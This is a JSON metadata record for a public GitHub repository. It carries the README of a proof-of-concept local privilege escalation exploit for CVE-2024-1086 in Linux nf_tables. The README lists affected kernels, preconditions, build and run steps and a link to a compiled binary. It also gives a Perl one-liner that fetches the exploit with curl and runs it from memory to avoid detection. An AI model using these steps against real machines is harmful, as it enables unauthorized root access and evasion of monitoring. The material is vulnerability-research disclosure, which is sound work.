[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"project-73198":3},{"id":4,"name":5,"fullName":6,"owner":7,"repo":5,"description":8,"homepage":9,"htmlUrl":10,"language":11,"languages":10,"totalLinesOfCode":10,"stars":12,"forks":13,"watchers":14,"openIssues":15,"contributorsCount":16,"subscribersCount":16,"size":16,"stars1d":17,"stars7d":18,"stars30d":19,"stars90d":16,"forks30d":16,"starsTrendScore":19,"compositeScore":20,"rankGlobal":10,"rankLanguage":10,"license":21,"archived":22,"fork":22,"defaultBranch":23,"hasWiki":24,"hasPages":22,"topics":25,"createdAt":10,"pushedAt":10,"updatedAt":31,"readmeContent":32,"aiSummary":33,"trendingCount":16,"starSnapshotCount":16,"syncStatus":18,"lastSyncTime":34,"discoverSource":35},73198,"CVE-2024-1086","Notselwyn\u002FCVE-2024-1086","Notselwyn","Universal local privilege escalation Proof-of-Concept exploit for CVE-2024-1086, working on most Linux kernels between v5.14 and v6.6, including Debian, Ubuntu, and KernelCTF. The success rate is 99.4% in KernelCTF images.","https:\u002F\u002Fpwning.tech\u002Fnftables",null,"C",2448,330,25,4,0,1,2,3,62.86,"MIT License",false,"main",true,[26,27,28,29,30],"cve","cve-2024-1086","exploit","lpe","poc","2026-06-12 04:01:08","# CVE-2024-1086\n\nUniversal local privilege escalation Proof-of-Concept exploit for [CVE-2024-1086](https:\u002F\u002Fnvd.nist.gov\u002Fvuln\u002Fdetail\u002FCVE-2024-1086), working on most Linux kernels between v5.14 and v6.6, including Debian, Ubuntu, and KernelCTF. 
The success rate is 99.4% in KernelCTF images.\n\nhttps:\u002F\u002Fgithub.com\u002FNotselwyn\u002FCVE-2024-1086\u002Fassets\u002F68616630\u002Fa3d43951-94ab-4c09-a14b-07b81f89b3de\n\n## Blogpost \u002F Write-up\n\nA full write-up of the exploit - including background information and loads of useful diagrams - can be found in the [Flipping Pages blogpost](https:\u002F\u002Fpwning.tech\u002Fnftables\u002F).\n\n\n## Affected versions\n\nThe exploit affects versions from (including) v5.14 to (including) v6.6, excluding patched branches v5.15.149>, v6.1.76>, v6.6.15>. The patches for these versions were released in February 2024. The underlying vulnerability affects all versions (excluding patched stable branches) from v3.15 to v6.8-rc1.\n\n**Caveats:**\n- The exploit does not work on v6.4> kernels with kconfig `CONFIG_INIT_ON_ALLOC_DEFAULT_ON=y` (including Ubuntu v6.5)\n- The exploit requires user namespaces (kconfig `CONFIG_USER_NS=y`), that those user namespaces are unprivileged (sh command `sysctl kernel.unprivileged_userns_clone` = 1), and that nf_tables is enabled (kconfig `CONFIG_NF_TABLES=y`). By default, these are all enabled on Debian, Ubuntu, and KernelCTF. Other distros have not been tested, but may work as well. Additionally, the exploit has only been tested on x64\u002Famd64.\n- The exploit may be *very* unstable on systems with a lot of network activity\n\t- Systems with a WiFi adapter, when surrounded by high-usage WiFi networks, will be very unstable. \n\t- On test devices, please turn off WiFi adapters through BIOS.\n- The kernel panic (system crash) after running the exploit is a side-effect which deliberately hasn't been fixed to prevent malicious usage of the exploit (i.e. exploitation attempts should now be more noticeable, and impractical in real-world operations). 
Despite this, it still allows for a working proof-of-concept in lab environments, as the root shell is functional, and persistence through disk is possible.\n\n## Usage\n\n### Configuration\n\nThe default values should work out of the box on Debian, Ubuntu, and KernelCTF with a local shell. On non-tested setups\u002Fdistros, please make sure the kconfig values match the target kernel. These can be specified in [`src\u002Fconfig.h`](\u002Fsrc\u002Fconfig.h). If you are running the exploit on a machine with more than 32GiB physical memory, make sure to increase `CONFIG_PHYS_MEM`.\nIf you are running the exploit over SSH (into the test machine) or a reverse shell, you may want to toggle `CONFIG_REDIRECT_LOG` to `1` to avoid unnecessary network activity.\n\n### Building\n\nIf this is impractical for you, there is a [compiled x64 binary](https:\u002F\u002Fgithub.com\u002FNotselwyn\u002FCVE-2024-1086\u002Freleases\u002Fdownload\u002Fv1.0.0\u002Fexploit) with the default config.\n\n```bash\ngit clone https:\u002F\u002Fgithub.com\u002FNotselwyn\u002FCVE-2024-1086\ncd CVE-2024-1086\nmake\n```\n\nBinary: `CVE-2024-1086\u002Fexploit`\n\n\n### Running\n\nRunning the exploit is just as trivial:\n\n```bash\n.\u002Fexploit\n```\n\nFileless execution is also supported, in case of pentest situations where detections need to be avoided. However, Perl needs to be installed on the target:\n```bash\nperl -e '\n  require qw\u002Fsyscall.ph\u002F;\n\n  my $fd = syscall(SYS_memfd_create(), $fn, 0);\n  system \"curl https:\u002F\u002Fexample.com\u002Fexploit -s >&$fd\";\n  exec {\"\u002Fproc\u002F$$\u002Ffd\u002F$fd\"} \"memfd\";\n'\n```\n\n## Disclaimer\n\nThe programs and scripts (\"programs\") in this software directory\u002Ffolder\u002Frepository (\"repository\") are published, developed and distributed for educational\u002Fresearch purposes only. 
I (\"the creator\") do not condone any malicious or illegal usage of the programs in this repository, as the intent is sharing research and not doing illegal activities with it. I am not legally responsible for anything you do with the programs in this repository.\n","This project is a universal local privilege escalation proof-of-concept (PoC) exploit for the CVE-2024-1086 vulnerability, applicable to most Linux kernels between v5.14 and v6.6, including Debian, Ubuntu, and KernelCTF environments. Its core function is local privilege escalation by exploiting a vulnerability in the nf_tables module, with a success rate of up to 99.4% in KernelCTF images. Technical characteristics include the need for user namespaces, unprivileged user namespace cloning, and nf_tables support, and it may be unstable in environments with heavy network activity. This project is suitable for security researchers to test and study the behaviour of this vulnerability in lab environments, but it is not recommended for use in production environments.","2026-06-11 03:44:28","high_star"]